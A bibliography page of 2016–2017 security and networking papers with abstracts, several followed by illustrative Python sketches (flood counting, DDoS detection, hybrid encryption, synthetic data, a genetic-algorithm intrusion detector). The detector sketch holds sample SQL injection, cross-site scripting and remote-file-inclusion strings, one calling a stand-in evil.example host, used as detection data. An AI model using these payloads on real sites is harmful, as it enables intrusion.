Biblio

Filters: First Letter Of Last Name is H
Huang, C., Hou, C., He, L., Dai, H., Ding, Y..  2017.  Policy-Customized: A New Abstraction for Building Security as a Service. 2017 14th International Symposium on Pervasive Systems, Algorithms and Networks 2017 11th International Conference on Frontier of Computer Science and Technology 2017 Third International Symposium of Creative Computing (ISPAN-FCST-ISCC). :203–210.

Just as cloud customers have different performance requirements, they also have different security requirements for their computations in the cloud. Researchers have suggested a "security on demand" service model for cloud computing, where secure computing environments are dynamically provisioned to cloud customers according to their specific security needs. The availability of secure computing platforms is a necessary but not a sufficient condition to convince cloud customers to move their sensitive data and code to the cloud. Cloud customers need further assurance that the security measures are indeed deployed and working correctly. In this paper, we present a Policy-Customized Trusted Cloud Service architecture with a new remote attestation scheme and a virtual machine migration protocol, in which cloud customers can customize the security policy of their computing environment and validate, throughout the virtual machine's life cycle, whether the current computing environment meets that policy. To demonstrate the feasibility of the proposed architecture, we realize a prototype based on the open-source Xen hypervisor that supports customer-customized security policies, along with a VM migration protocol that supports customer-customized migration policies and validation.

Benjamin, B., Coffman, J., Esiely-Barrera, H., Farr, K., Fichter, D., Genin, D., Glendenning, L., Hamilton, P., Harshavardhana, S., Hom, R. et al..  2017.  Data Protection in OpenStack. 2017 IEEE 10th International Conference on Cloud Computing (CLOUD). :560–567.

As cloud computing becomes increasingly pervasive, it is critical for cloud providers to support basic security controls. Although major cloud providers tout such features, relatively little is known in many cases about their design and implementation. In this paper, we describe several security features in OpenStack, a widely-used, open source cloud computing platform. Our contributions to OpenStack range from key management and storage encryption to guaranteeing the integrity of virtual machine (VM) images prior to boot. We describe the design and implementation of these features in detail and provide a security analysis that enumerates the threats that each mitigates. Our performance evaluation shows that these security features have an acceptable cost, in some cases within the measurement error observed in an operational cloud deployment. Finally, we highlight lessons learned from our real-world development experiences from contributing these features to OpenStack as a way to encourage others to transition their research into practice.

Viet, A. N., Van, L. P., Minh, H. A. N., Xuan, H. D., Ngoc, N. P., Huu, T. N..  2017.  Mitigating HTTP GET flooding attacks in SDN using NetFPGA-based OpenFlow switch. 2017 14th International Conference on Electrical Engineering/Electronics, Computer, Telecommunications and Information Technology (ECTI-CON). :660–663.

In this paper, we propose a hardware-based defense system in a Software-Defined Networking architecture to protect against HTTP GET flooding attacks, one of the most dangerous Distributed Denial of Service (DDoS) attacks of recent years. Our defense system utilizes a per-URL counting mechanism and has been implemented on an FPGA as an extension of a NetFPGA-based OpenFlow switch.
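As a rough software illustration of the per-URL counting idea (the paper realizes it in hardware on the NetFPGA-based OpenFlow switch), the Python sketch below counts GET requests per URL within a fixed counting window and flags URLs that exceed a threshold; the window length, threshold, and class name are assumptions for illustration, not values from the paper.

# Illustrative per-URL GET-flood counter; window and threshold are placeholders.
from collections import Counter
import time

WINDOW_SECONDS = 10      # counting window length (assumed)
THRESHOLD = 500          # GET requests per URL per window before flagging (assumed)

class PerUrlCounter:
    def __init__(self):
        self.window_start = time.monotonic()
        self.counts = Counter()

    def observe(self, url):
        """Count one HTTP GET request; return True if the URL looks flooded."""
        now = time.monotonic()
        if now - self.window_start > WINDOW_SECONDS:
            self.counts.clear()              # start a fresh counting window
            self.window_start = now
        self.counts[url] += 1
        return self.counts[url] > THRESHOLD  # candidate for mitigation

counter = PerUrlCounter()
if counter.observe("/index.html"):
    print("possible HTTP GET flood on /index.html")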

Hyun, D., Kim, J., Hong, D., Jeong, J. P..  2017.  SDN-based network security functions for effective DDoS attack mitigation. 2017 International Conference on Information and Communication Technology Convergence (ICTC). :834–839.

Distributed Denial of Service (DDoS) attacks have raised serious security concerns for banks, financial corporations, public institutions, and data centers. The emerging wave of the Internet of Things (IoT) also raises new concerns about smart devices. Software Defined Networking (SDN) and Network Functions Virtualization (NFV) have provided a new paradigm for network security. In this paper, we propose a new method to efficiently prevent DDoS attacks, based on an SDN/NFV framework. To resolve the problem of normal packets being blocked during the inspection of suspicious packets, we developed a threshold-based method that provides clients with efficient, fast DDoS attack mitigation. In addition, we use open source code to develop the security functions in order to implement our solution for SDN-based network security functions. The source code is based on the NETCONF protocol [1] and the YANG data model [2].
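The threshold-based separation can be illustrated with a minimal sketch: traffic from sources whose measured rate stays below a threshold is forwarded immediately, and only sources above the threshold are diverted for deeper inspection, so normal packets are not held up. The threshold value, data structure, and function names below are assumptions, not taken from the paper.

from collections import defaultdict

RATE_THRESHOLD = 1000               # packets per second per source (assumed)
packet_rates = defaultdict(float)   # filled by a monitoring loop: source IP -> pps

def handle(src_ip):
    """Decide how to treat traffic from src_ip without delaying normal flows."""
    if packet_rates[src_ip] > RATE_THRESHOLD:
        return "divert_to_inspection"   # only suspicious sources are delayed
    return "forward"                    # normal traffic passes immediately

packet_rates["203.0.113.7"] = 45_000.0  # example: a source flooding the network
print(handle("203.0.113.7"), handle("198.51.100.2"))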

He, Z., Zhang, T., Lee, R. B..  2017.  Machine Learning Based DDoS Attack Detection from Source Side in Cloud. 2017 IEEE 4th International Conference on Cyber Security and Cloud Computing (CSCloud). :114–120.

Denial of service (DOS) attacks are a serious threat to network security. These attacks are often sourced from virtual machines in the cloud, rather than from the attacker's own machine, to achieve anonymity and higher network bandwidth. Past research focused on analyzing traffic on the destination (victim's) side with predefined thresholds. These approaches have significant disadvantages: they are only passive defenses applied after the attack, they cannot use the outbound statistical features of attacks, and it is hard to trace back to the attacker with them. In this paper, we propose a DOS attack detection system on the source side in the cloud, based on machine learning techniques. This system leverages statistical information from both the cloud server's hypervisor and the virtual machines to prevent attack packets from being sent out to the external network. We evaluate nine machine learning algorithms and carefully compare their performance. Our experimental results show that more than 99.7% of four kinds of DOS attacks are successfully detected. Our approach does not degrade performance and can be easily extended to broader DOS attacks.
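As a hedged illustration of source-side detection (not the authors' exact feature set, data, or models), the sketch below trains a scikit-learn classifier on per-VM outbound traffic statistics; the feature names and toy samples are invented, and the paper itself compares nine learning algorithms.

import numpy as np
from sklearn.ensemble import RandomForestClassifier

# Each row: [packets/s, bytes/s, distinct destination IPs, SYN ratio] for one VM.
X = np.array([[120, 9.6e4, 3, 0.02],        # benign-looking sample (invented)
              [50_000, 4.1e7, 950, 0.97],   # flood-like sample (invented)
              [300, 2.2e5, 5, 0.05],
              [48_000, 3.9e7, 900, 0.95]])
y = np.array([0, 1, 0, 1])                  # 0 = normal outbound traffic, 1 = attack

clf = RandomForestClassifier(n_estimators=100, random_state=0).fit(X, y)
new_vm = np.array([[47_500, 3.8e7, 870, 0.96]])  # outbound statistics of a VM to check
print(clf.predict(new_vm))                       # 1 -> looks like an attack source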

Shin, Youngjoo, Koo, Dongyoung, Hur, Junbeom.  2017.  A Survey of Secure Data Deduplication Schemes for Cloud Storage Systems. ACM Comput. Surv.. 49:74:1–74:38.

Data deduplication has attracted many cloud service providers (CSPs) as a way to reduce storage costs. Even though the general deduplication approach has been increasingly accepted, it comes with many security and privacy problems due to the outsourced data delivery models of cloud storage. To deal with specific security and privacy issues, secure deduplication techniques have been proposed for cloud data, leading to a diverse range of solutions and trade-offs. Hence, in this article, we discuss ongoing research on secure deduplication for cloud data in consideration of the attack scenarios exploited most widely in cloud storage. On the basis of a classification of deduplication systems, we explore security risks and attack scenarios posed by both inside and outside adversaries. We then describe state-of-the-art secure deduplication techniques for each approach that deal with different security issues under specific or combined threat models, which include both cryptographic and protocol solutions. We discuss and compare each scheme in terms of security and efficiency specific to different security goals. Finally, we identify and discuss unresolved issues and further research challenges for secure deduplication in cloud storage.

Ahmad, M., Shahid, A., Qadri, M. Y., Hussain, K., Qadri, N. N..  2017.  Fingerprinting non-numeric datasets using row association and pattern generation. 2017 International Conference on Communication Technologies (ComTech). :149–155.

In today's era of fast, Internet-based application environments, large volumes of relational data are being outsourced for business purposes. Ownership and digital rights protection has therefore become one of the greatest challenges and most critical issues. This paper presents a novel fingerprinting technique to protect ownership rights of non-numeric digital data on the basis of pattern generation and row association schemes. First, a fingerprint sequence is formulated using a secret key and the buyer's unique ID. Using chunks of this sequence and the Fibonacci series, we select a set of rows; the selected rows are the candidates for fingerprinting. The primary key of each selected row is protected using RSA encryption, after which a pattern is designed by randomly choosing values from different attributes of the dataset. Encrypting the primary key creates an association between the original and fake patterns, which eases fingerprint detection. The fingerprint detection algorithm first finds the fake rows and then extracts the fingerprint sequence from the fake attributes, thereby identifying the traitor. One of the most important features of the proposed approach is that it overcomes major weaknesses of previously proposed fingerprinting techniques, such as limited error tolerance, integrity, and accuracy. The results show that the technique is efficient and robust against several malicious attacks.
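The row-selection step can be sketched in a few lines: a fingerprint sequence is derived from the secret key and buyer ID, and Fibonacci-spaced indices pick the candidate rows. The hash function, wrapping, and parameter choices below are illustrative assumptions, not the authors' exact construction.

import hashlib

def fingerprint_sequence(secret_key: str, buyer_id: str) -> str:
    """Derive a bit string that identifies this buyer's copy of the dataset."""
    digest = hashlib.sha256((secret_key + buyer_id).encode()).hexdigest()
    return bin(int(digest, 16))[2:]

def fibonacci_row_indices(num_rows: int, count: int):
    """Pick candidate rows at Fibonacci positions, wrapped to the table size."""
    a, b, indices = 1, 2, []
    while len(indices) < count:
        indices.append(a % num_rows)
        a, b = b, a + b
    return indices

seq = fingerprint_sequence("owner-secret", "buyer-42")
rows = fibonacci_row_indices(num_rows=10_000, count=16)
print(seq[:16], rows)   # bits to embed and the rows chosen to carry them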

Ping, Haoyue, Stoyanovich, Julia, Howe, Bill.  2017.  DataSynthesizer: Privacy-Preserving Synthetic Datasets. Proceedings of the 29th International Conference on Scientific and Statistical Database Management. :42:1–42:5.
To facilitate collaboration over sensitive data, we present DataSynthesizer, a tool that takes a sensitive dataset as input and generates a structurally and statistically similar synthetic dataset with strong privacy guarantees. The data owners need not release their data, while potential collaborators can begin developing models and methods with some confidence that their results will work similarly on the real dataset. The distinguishing feature of DataSynthesizer is its usability — the data owner does not have to specify any parameters to start generating and sharing data safely and effectively. DataSynthesizer consists of three high-level modules — DataDescriber, DataGenerator and ModelInspector. The first, DataDescriber, investigates the data types, correlations and distributions of the attributes in the private dataset, and produces a data summary, adding noise to the distributions to preserve privacy. DataGenerator samples from the summary computed by DataDescriber and outputs synthetic data. ModelInspector shows an intuitive description of the data summary that was computed by DataDescriber, allowing the data owner to evaluate the accuracy of the summarization process and adjust any parameters, if desired. We describe DataSynthesizer and illustrate its use in an urban science context, where sharing sensitive, legally encumbered data between agencies and with outside collaborators is reported as the primary obstacle to data-driven governance. The code implementing all parts of this work is publicly available at https://github.com/DataResponsibly/DataSynthesizer.
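The three-module pipeline can be sketched with the library's correlated attribute mode; the method names below follow the project's documentation, but exact signatures, the epsilon/k values, and the file paths are assumptions to be checked against the repository.

from DataSynthesizer.DataDescriber import DataDescriber
from DataSynthesizer.DataGenerator import DataGenerator

input_csv = 'sensitive.csv'            # private input dataset (placeholder path)
description_file = 'description.json'  # noisy data summary produced by DataDescriber
synthetic_csv = 'synthetic.csv'

# DataDescriber: learn attribute types, distributions, and correlations,
# adding noise (differential privacy budget epsilon) to the summary.
describer = DataDescriber(category_threshold=20)
describer.describe_dataset_in_correlated_attribute_mode(dataset_file=input_csv,
                                                        epsilon=1.0,
                                                        k=2)  # Bayesian network degree
describer.save_dataset_description_to_file(description_file)

# DataGenerator: sample synthetic records from the noisy summary only.
generator = DataGenerator()
generator.generate_dataset_in_correlated_attribute_mode(10_000, description_file)
generator.save_synthetic_data(synthetic_csv)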
He, Zaobo, Cai, Zhipeng, Sun, Yunchuan, Li, Yingshu, Cheng, Xiuzhen.  2017.  Customized Privacy Preserving for Inherent Data and Latent Data. Personal Ubiquitous Comput.. 21:43–54.
The huge amount of sensory data collected from mobile devices offers great potential for more significant services based on user data extracted from sensor readings. However, releasing user data could also seriously threaten user privacy. It is possible to directly collect sensitive information from released user data without user permission. Furthermore, third-party users can also infer sensitive information contained in released data in a latent manner by utilizing data mining techniques. In this paper, we formally define these two types of threats as inherent data privacy and latent data privacy and construct a data-sanitization strategy that can optimize the trade-off between data utility and the two customized types of privacy. The key novel idea is that the developed strategy can combat powerful third-party users who have broad knowledge about users and launch optimal inference attacks. We show that our strategy does not substantially reduce the benefit brought by user data, while sensitive information can still be protected. To the best of our knowledge, this is the first work that preserves both inherent data privacy and latent data privacy.
Harini, M., Gowri, K. P., Pavithra, C., Selvarani, M. P..  2017.  A novel security mechanism using hybrid cryptography algorithms. 2017 IEEE International Conference on Electrical, Instrumentation and Communication Engineering (ICEICE). :1–4.

Data security is a primary concern for every communication system. Communication has become an essential tool for business, education, defense services, and more, so it is essential to transfer data safely and securely. At present, various cryptography algorithms have been proposed and implemented; these algorithms are classified into symmetric and asymmetric algorithms based on the number of keys used. Even though several algorithms are used for data security, each can be compromised at some point. The idea is therefore to combine several secure algorithms to provide a highly secure environment for data transmission. The algorithms to be combined are the AES symmetric cryptographic algorithm, the RSA asymmetric algorithm, and the MD5 hashing algorithm. With these three algorithms, we can ensure three cryptographic primitives: confidentiality, authentication, and integrity of data.
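A minimal sketch of the hybrid idea, assuming the PyCryptodome library: AES encrypts the bulk data (confidentiality), RSA wraps the AES session key, and an MD5 digest lets the receiver check integrity. Key sizes, the AES mode, and variable names are illustrative choices, not taken from the paper.

import hashlib
from Crypto.Cipher import AES, PKCS1_OAEP
from Crypto.PublicKey import RSA
from Crypto.Random import get_random_bytes

message = b"transfer data safely and securely"
digest = hashlib.md5(message).hexdigest()           # integrity check value

session_key = get_random_bytes(16)                  # 128-bit AES session key
aes = AES.new(session_key, AES.MODE_EAX)
ciphertext, tag = aes.encrypt_and_digest(message)   # confidentiality

rsa_key = RSA.generate(2048)                        # receiver's key pair
wrapped_key = PKCS1_OAEP.new(rsa_key.publickey()).encrypt(session_key)

# Receiver side: unwrap the AES key, decrypt, and verify the MD5 digest.
recovered_key = PKCS1_OAEP.new(rsa_key).decrypt(wrapped_key)
plaintext = AES.new(recovered_key, AES.MODE_EAX, nonce=aes.nonce).decrypt_and_verify(ciphertext, tag)
assert hashlib.md5(plaintext).hexdigest() == digest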

Higuchi, K., Yoshida, M., Tsuji, T., Miyamoto, N..  2017.  Correctness of the routing algorithm for distributed key-value store based on order preserving linear hashing and skip graph. 2017 18th IEEE/ACIS International Conference on Software Engineering, Artificial Intelligence, Networking and Parallel/Distributed Computing (SNPD). :459–464.

In this paper, the correctness of the routing algorithm for a distributed key-value store based on order-preserving linear hashing and Skip Graph is proved. In this system, data are partitioned by linear hashing, and Skip Graph is used for the overlay network. The routing tables of this system are very uniform, so short detours can exist in forwarding routes; by using these detours, the number of hops needed for query forwarding is reduced.

Alwen, Joel, Blocki, Jeremiah, Harsha, Ben.  2017.  Practical Graphs for Optimal Side-Channel Resistant Memory-Hard Functions. Proceedings of the 2017 ACM SIGSAC Conference on Computer and Communications Security. :1001–1017.
A memory-hard function (MHF) ƒn with parameter n can be computed in sequential time and space n. Simultaneously, a high amortized parallel area-time complexity (aAT) is incurred per evaluation. In practice, MHFs are used to limit the rate at which an adversary (using a custom computational device) can evaluate a security-sensitive function that still occasionally needs to be evaluated by honest users (using an off-the-shelf general purpose device). The most prevalent examples of such sensitive functions are Key Derivation Functions (KDFs) and password hashing algorithms, where rate limits help mitigate off-line dictionary attacks. As the honest users' inputs to these functions are often (low-entropy) passwords, special attention is given to a class of side-channel resistant MHFs called iMHFs. Essentially all iMHFs can be viewed as some mode of operation (making n calls to some round function) given by a directed acyclic graph (DAG) with very low indegree. Recently, a combinatorial property of a DAG has been identified (called "depth-robustness") which results in good provable security for an iMHF based on that DAG. Depth-robust DAGs have also proven useful in other cryptographic applications. Unfortunately, until now, all known very depth-robust DAGs are impractically complicated, and little is known about their exact (i.e., non-asymptotic) depth-robustness both in theory and in practice. In this work we build and analyze (both formally and empirically) several exceedingly simple and efficient-to-navigate practical DAGs for use in iMHFs and other applications. For each DAG we: (1) prove that its depth-robustness is asymptotically maximal; (2) prove bounds on its exact depth-robustness that are at least three orders of magnitude better than known bounds for other practical iMHFs; and (3) implement and empirically evaluate its depth-robustness and aAT against a variety of state-of-the-art (and several new) depth-reduction and low-aAT attacks. We find that, against all attacks, the new DAGs perform significantly better in practice than Argon2i, the most widely deployed iMHF in practice. Along the way we also improve the best known empirical attacks on the aAT of Argon2i by implementing and testing several heuristic versions of a (hitherto purely theoretical) depth-reduction attack. Finally, we demonstrate the practicality of our constructions by modifying the Argon2i code base to use one of the new high-aAT DAGs. Experimental benchmarks on a standard off-the-shelf CPU show that the new modifications do not adversely affect the impressive throughput of Argon2i (despite seemingly enjoying significantly higher aAT).
Bai, Jiale, Ni, Bingbing, Wang, Minsi, Shen, Yang, Lai, Hanjiang, Zhang, Chongyang, Mei, Lin, Hu, Chuanping, Yao, Chen.  2017.  Deep Progressive Hashing for Image Retrieval. Proceedings of the 2017 ACM on Multimedia Conference. :208–216.

This paper proposes a novel recursive hashing scheme, in contrast to conventional "one-off" hashing algorithms. Inspired by the human "nonsalient-to-salient" perception path, the proposed hashing scheme generates a series of binary codes based on progressively expanded salient regions. Built on a recurrent deep network, i.e., an LSTM structure, the binary codes generated from later output nodes naturally inherit information aggregated from previous codes while exploring novel information from the extended salient region, and the scheme therefore possesses a good scalability property. The proposed deep hashing network is trained by minimizing a triplet ranking loss and is end-to-end trainable. Extensive experimental results on several image retrieval benchmarks demonstrate a good performance gain over state-of-the-art image retrieval methods, as well as the scheme's scalability.

Hu, Qinghao, Wu, Jiaxiang, Cheng, Jian, Wu, Lifang, Lu, Hanqing.  2017.  Pseudo Label Based Unsupervised Deep Discriminative Hashing for Image Retrieval. Proceedings of the 2017 ACM on Multimedia Conference. :1584–1590.

Hashing methods play an important role in large-scale image retrieval. Traditional hashing methods use hand-crafted features to learn hash functions, which cannot capture high-level semantic information. Deep hashing algorithms use deep neural networks to learn feature representations and hash functions simultaneously. Most of these algorithms exploit supervised information to train the deep network; however, supervised information is expensive to obtain. In this paper, we propose a pseudo-label based unsupervised deep discriminative hashing algorithm. First, we cluster images via K-means and treat the cluster labels as pseudo labels. Then we train a deep hashing network with the pseudo labels by minimizing a classification loss and a quantization loss. Experiments on two datasets demonstrate that our unsupervised deep discriminative hashing method outperforms state-of-the-art unsupervised hashing methods.
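A conceptual sketch of the pseudo-label training loop described above (not the authors' network or hyperparameters): K-means cluster labels serve as pseudo labels, and a small network is trained with a classification loss plus a quantization loss that pushes outputs toward binary codes. The architecture, loss weight, and random stand-in features below are assumptions.

import torch
import torch.nn as nn
from sklearn.cluster import KMeans

torch.manual_seed(0)
features = torch.randn(512, 128)                 # stand-in for deep image features

# Step 1: K-means cluster labels become pseudo labels.
pseudo = KMeans(n_clusters=10, n_init=10, random_state=0).fit_predict(features.numpy())
pseudo = torch.tensor(pseudo, dtype=torch.long)

# Step 2: train a hashing head with classification + quantization losses.
hash_bits = 32
net = nn.Sequential(nn.Linear(128, 256), nn.ReLU(), nn.Linear(256, hash_bits), nn.Tanh())
classifier = nn.Linear(hash_bits, 10)
opt = torch.optim.Adam(list(net.parameters()) + list(classifier.parameters()), lr=1e-3)
ce = nn.CrossEntropyLoss()

for epoch in range(20):
    codes = net(features)                        # relaxed hash codes in (-1, 1)
    cls_loss = ce(classifier(codes), pseudo)     # fit the pseudo labels
    quant_loss = (codes.abs() - 1).pow(2).mean() # push codes toward +/- 1
    loss = cls_loss + 0.1 * quant_loss
    opt.zero_grad()
    loss.backward()
    opt.step()

binary_codes = torch.sign(net(features))         # final binary hash codes for retrieval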

Li, Zhijun, He, Tian.  2017.  WEBee: Physical-Layer Cross-Technology Communication via Emulation. Proceedings of the 23rd Annual International Conference on Mobile Computing and Networking. :2–14.
Recent advances in Cross-Technology Communication (CTC) have improved efficient coexistence and cooperation among heterogeneous wireless devices (e.g., WiFi, ZigBee, and Bluetooth) operating in the same ISM band. However, until now the effectiveness of existing CTCs, which rely on packet-level modulation, is limited due to their low throughput (e.g., tens of bps). Our work, named WEBee, opens a promising direction for high-throughput CTC via physical-level emulation. WEBee uses a high-speed wireless radio (e.g., WiFi OFDM) to emulate the desired signals of a low-speed radio (e.g., ZigBee). Our unique emulation technique manipulates only the payload of WiFi packets, requiring neither hardware nor firmware changes in commodity technologies – a feature allowing zero-cost fast deployment on existing WiFi infrastructure. We designed and implemented WEBee with commodity devices (Atheros AR2425 WiFi card and MicaZ CC2420) and the USRP-N210 platform (for PHY layer evaluation). Our comprehensive evaluation reveals that WEBee can achieve a more than 99% reliable parallel CTC between WiFi and ZigBee with 126 Kbps in noisy environments, a throughput about 16,000x faster than current state-of-the-art CTCs.
Chen, Chen, Tong, Hanghang, Xie, Lei, Ying, Lei, He, Qing.  2017.  Cross-Dependency Inference in Multi-Layered Networks: A Collaborative Filtering Perspective. ACM Trans. Knowl. Discov. Data. 11:42:1–42:26.
The increasingly connected world has catalyzed the fusion of networks from different domains, which facilitates the emergence of a new network model—multi-layered networks. Examples of such network systems include critical infrastructure networks, biological systems, organization-level collaborations, cross-platform e-commerce, and so forth. One crucial structure that distinguishes multi-layered networks from other network models is the cross-layer dependency, which describes the associations between nodes from different layers. Needless to say, the cross-layer dependency in the network plays an essential role in many data mining applications like system robustness analysis and complex network control. However, it remains a daunting task to know the exact dependency relationships due to noise, limited accessibility, and so forth. In this article, we tackle the cross-layer dependency inference problem by modeling it as a collective collaborative filtering problem. Based on this idea, we propose an effective algorithm Fascinate that can reveal unobserved dependencies with linear complexity. Moreover, we derive Fascinate-ZERO, an online variant of Fascinate that can respond to a newly added node in a timely manner by checking its neighborhood dependencies. We perform extensive evaluations on real datasets to substantiate the superiority of our proposed approaches.
Bronte, Robert, Shahriar, Hossain, Haddad, Hisham M..  2016.  A Signature-Based Intrusion Detection System for Web Applications Based on Genetic Algorithm. Proceedings of the 9th International Conference on Security of Information and Networks. :32–39.
Web application attacks are an extreme threat to the world's information technology infrastructure. A web application is generally defined as a client-server software application where the client uses a user interface within a web browser. Most users are familiar with web application attacks; for instance, a user may have received a link in an email that led the user to a malicious website. The most widely accepted solution to this threat is to deploy an Intrusion Detection System (IDS). Such a system currently relies on signatures of a predefined set of events matching known attacks. Issues still arise because not all possible attack signatures may be defined before deploying an IDS, and attack events may not fit the pre-defined signatures. Thus, there is a need to detect new types of attacks with a mutated signature based detection approach. Most traditional works in the literature describe signature-based IDSs for application-layer attacks, but several note that not all attacks can be detected. It is well known that many security threats can be related to software or application development and design or implementation flaws. Given that fact, this work develops a new method for signature-based detection of web application-layer attacks. We apply a genetic algorithm to analyze web server and database logs and their entries. The work contributes to the development of a mutated signature detection framework. The initial results show that the suggested approach can detect specific application-layer attacks such as Cross-Site Scripting, SQL Injection, and Remote File Inclusion attacks.
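A toy sketch of the signature-mutation idea (the representation, fitness function, and log lines below are invented for illustration and are not the authors' encoding): candidate signature fragments are seeded from log entries and evolved with a genetic algorithm so that they match attack entries but not benign ones.

import random

random.seed(0)
attack_log = ["GET /item?id=1' OR '1'='1",                      # SQL injection
              "GET /search?q=<script>alert(1)</script>",        # cross-site scripting
              "GET /page.php?file=http://evil.example/shell"]   # remote file inclusion
benign_log = ["GET /index.html", "GET /search?q=shoes", "GET /item?id=17"]

def random_fragment(length=6):
    """Seed a candidate signature from a random window of a log line."""
    line = random.choice(attack_log + benign_log).lower()
    start = random.randrange(len(line) - length)
    return line[start:start + length]

def fitness(sig):
    hits = sum(sig in line.lower() for line in attack_log)
    false_hits = sum(sig in line.lower() for line in benign_log)
    return hits - 2 * false_hits          # reward attack-only matches

def crossover(a, b):
    cut = random.randrange(1, len(a))
    return a[:cut] + b[cut:]

def mutate(sig):
    i = random.randrange(len(sig))
    return sig[:i] + random_fragment()[i] + sig[i + 1:]

population = [random_fragment() for _ in range(50)]
for generation in range(100):
    population.sort(key=fitness, reverse=True)
    parents = population[:10]             # selection: keep the fittest fragments
    population = parents + [mutate(crossover(random.choice(parents), random.choice(parents)))
                            for _ in range(40)]

best = max(population, key=fitness)
print(best, fitness(best))                # evolved signature fragment and its score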
Zhang, Yuexin, Xiang, Yang, Huang, Xinyi.  2016.  Password-Authenticated Group Key Exchange: A Cross-Layer Design. ACM Trans. Internet Technol.. 16:24:1–24:20.
Two-party password-authenticated key exchange (2PAKE) protocols provide a natural mechanism for secret key establishment in distributed applications, and they have been extensively studied in past decades. However, only a few efforts have been made so far to design password-authenticated group key exchange (GPAKE) protocols. In a 2PAKE or GPAKE protocol, it is assumed that short passwords are preshared among users. This assumption, however, would be impractical in certain applications. Motivated by this observation, this article presents a GPAKE protocol without the password-sharing assumption. To obtain the passwords, wireless devices, such as smart phones, tablets, and laptops, are used to extract short secrets at the physical layer. Using the extracted secrets, users in our protocol can establish a group key at higher layers with light computational cost. Thus, our GPAKE protocol is a cross-layer design. Additionally, our protocol is a compiler; that is, it can transform any provably secure 2PAKE protocol into a GPAKE protocol with only one more round of communication. Moreover, the proposed protocol is proven secure in the standard model.
Graur, O., Islam, N., Henkel, W..  2016.  Quantization for Physical Layer Security. 2016 IEEE Globecom Workshops (GC Wkshps). :1–7.

We propose a multi-level CSI quantization and key reconciliation scheme for physical layer security. The noisy wireless channel estimates obtained by the users first run through a transformation prior to the quantization step. This enables the definition of guard bands around the quantization boundaries, tailored for a specific efficiency, without compromising the uniformity required at the output of the quantizer. Our construction results in a better trade-off between key disagreement and initial key generation rate when compared to other level-crossing quantization methods.
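A small numpy sketch of multi-level quantization with guard bands: samples that fall too close to a quantization boundary are discarded, so channel noise is less likely to push the two users into different quantization bins. The number of levels, guard width, and toy distribution are illustrative assumptions, not the paper's design values.

import numpy as np

rng = np.random.default_rng(0)
csi = rng.standard_normal(1000)                   # transformed channel estimates (toy data)
boundaries = np.quantile(csi, [0.25, 0.5, 0.75])  # 4-level (2-bit) quantizer boundaries
guard = 0.1                                       # guard-band half-width (assumed)

def quantize(sample):
    """Map a sample to a 2-bit symbol, or drop it if it lies inside a guard band."""
    if np.min(np.abs(sample - boundaries)) < guard:
        return None                               # too close to a boundary: discard
    return int(np.searchsorted(boundaries, sample))

symbols = [q for q in map(quantize, csi) if q is not None]
key_bits = "".join(f"{s:02b}" for s in symbols)   # 2 bits of key material per kept sample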

Chen, W., Hong, L., Shetty, S., Lo, D., Cooper, R..  2016.  Cross-Layered Security Approach with Compromised Nodes Detection in Cooperative Sensor Networks. 2016 IEEE International Parallel and Distributed Processing Symposium Workshops (IPDPSW). :499–508.

Cooperative MIMO communication is a promising technology that enables a realistic solution for improving communication performance with MIMO techniques in wireless networks composed of size- and cost-constrained devices. However, the security problems inherent to cooperative communication also arise. Cryptography can ensure confidentiality in the communication and routing between authorized participants, but it usually cannot prevent attacks from compromised nodes, which may corrupt communications by sending garbled signals. In this paper, we propose a cross-layered approach to enhance security in query-based cooperative MIMO sensor networks. The approach combines an efficient cryptographic technique implemented in the upper layers with a novel information-theory-based compromised node detection algorithm in the physical layer. In the detection algorithm, a cluster of K cooperative nodes is used to identify up to K - 1 active compromised nodes. When compromised nodes are detected, key revocation is performed to isolate them and reconfigure the cooperative MIMO sensor network. During this process, beamforming is used to avoid information leakage. The proposed security scheme can be easily modified and applied to cognitive radio networks. Simulation results show that the proposed algorithm for compromised node detection is effective and efficient, and that the accuracy of the received information is significantly improved.

Hamamreh, J. M., Yusuf, M., Baykas, T., Arslan, H..  2016.  Cross MAC/PHY layer security design using ARQ with MRC and adaptive modulation. 2016 IEEE Wireless Communications and Networking Conference. :1–7.

In this work, Automatic Repeat Request (ARQ) and Maximal Ratio Combining (MRC) have been jointly exploited to enhance the confidentiality of wireless services requested by a legitimate user (Bob) against an eavesdropper (Eve). The obtained security performance is analyzed using the Packet Error Rate (PER), where the exact PER gap between Bob and Eve is determined. PER is proposed as a new practical security metric in cross-layer (Physical/MAC) security design since it reflects the influence of upper-layer mechanisms, and it can be linked with Quality of Service (QoS) requirements for various digital services such as voice and video. Exact PER formulas for both Eve and Bob in an i.i.d. Rayleigh fading channel are derived. The simulation and theoretical results show that the employment of the ARQ mechanism and MRC on a signal-level basis before demodulation can significantly enhance data security for certain services at specific SNRs. However, to increase and ensure the security of a specific service at any SNR, adaptive modulation is proposed to be used along with the aforementioned scheme. Analytical and simulation studies demonstrate orders of magnitude difference in PER performance between eavesdroppers and intended receivers.

Procter, Sam, Vasserman, Eugene Y., Hatcliff, John.  2017.  SAFE and Secure: Deeply Integrating Security in a New Hazard Analysis. Proceedings of the 12th International Conference on Availability, Reliability and Security. :66:1–66:10.

Safety-critical system engineering and traditional safety analyses have for decades been focused on problems caused by natural or accidental phenomena. Security analyses, on the other hand, focus on preventing intentional, malicious acts that reduce system availability, degrade user privacy, or enable unauthorized access. In the context of safety-critical systems, safety and security are intertwined, e.g., injecting malicious control commands may lead to system actuation that causes harm. Despite this intertwining, safety and security concerns have traditionally been designed and analyzed independently of one another, and examined in very different ways. In this work we examine a new hazard analysis technique—Systematic Analysis of Faults and Errors (SAFE)—and its deep integration of safety and security concerns. This is achieved by explicitly incorporating a semantic framework of error "effects" that unifies an adversary model long used in security contexts with a fault/error categorization that aligns with previous approaches to hazard analysis. This categorization enables analysts to separate the immediate, component-level effects of errors from their cause or precise deviation from specification. This paper details SAFE's integrated handling of safety and security through a) a methodology grounded in—and adaptable to—different approaches from the literature, b) explicit documentation of system assumptions which are implicit in other analyses, and c) increasing the tractability of analyzing modern, complex, component-based software-driven systems. We then discuss how SAFE's approach supports the long-term goals of increased compositionality and formalization of safety/security analysis.

Hamasaki, J., Iwamura, K..  2017.  Geometric group key-sharing scheme using euclidean distance. 2017 14th IEEE Annual Consumer Communications Networking Conference (CCNC). :1004–1005.

